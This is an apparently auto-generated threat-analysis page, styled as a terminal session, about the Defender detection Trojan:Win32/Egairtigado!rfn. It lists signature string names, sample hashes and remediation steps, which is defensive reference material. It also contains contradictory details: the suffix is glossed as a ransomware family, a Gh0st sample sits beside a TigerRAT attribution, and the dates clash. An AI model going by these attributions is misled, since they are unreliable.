user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win32/Egairtigado!rfn
Trojan:Win32/Egairtigado!rfn - Windows Defender threat signature analysis

Trojan:Win32/Egairtigado!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Egairtigado!rfn
Classification:
Type:Trojan
Platform:Win32
Family:Egairtigado
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Egairtigado

Summary:

Trojan:Win32/Egairtigado!rfn is a concrete detection of the sophisticated TigerRAT backdoor, attributed to the Andariel APT group. This malware uses extensive hooking, legitimate Windows utilities (mshta, regsvr32, rundll32, PowerShell, BITS) for execution and persistence, enabling remote control, data exfiltration, and evasion.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: wzyak9hrh.exe
48548d9678e0433d52837ba124819ae8e7ee54641a96936b32b46deb312f2463
23/03/2026
VirusTotalDownload Sample
Filename: 824CB7842629A59CC56B5C86CF29CE6B.exe
c8e41815770b17624a724a6f16be26a55f8d7fdb12dba529efb4b388ac19f8e3
23/03/2026
VirusTotalDownload Sample
Filename: Gh0st.exe
4d0ac144f8c297610edb552710c198eef0bac2ac1cacd8210a437941dae3987d
23/03/2026
VirusTotalDownload Sample
Filename: SecuriteInfo.com.Win64.MalwareX-gen.54486257
8428d2db1f70caaa79934f30068fb4eddd4874ca5702ad53c5c8c12c46513f24
23/03/2026
VirusTotalDownload Sample
Filename: ea26d6a614701b03.exe
ea26d6a614701b039394bf7cf50b7cf63ad98fb90c0328e5ffd87ccdb9816be8
23/03/2026
VirusTotalDownload Sample
Filename: x346e75418d57e184806.exe
346e75418d57e1848064614e3922813955ca10e7d015ba3679f9036ac31fa1bd
23/03/2026
VirusTotalDownload Sample
5ae30eecdfb95d98cf238ff69b392cb36d1d3fb09481d79fa92c69dad48a0df0
22/03/2026
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected system. Perform a full system scan with updated antivirus, then conduct a thorough forensic investigation to identify the initial compromise vector, scope, and any lateral movement. Reset all potentially compromised credentials and enhance network monitoring for related indicators of compromise.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 22/01/2026. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$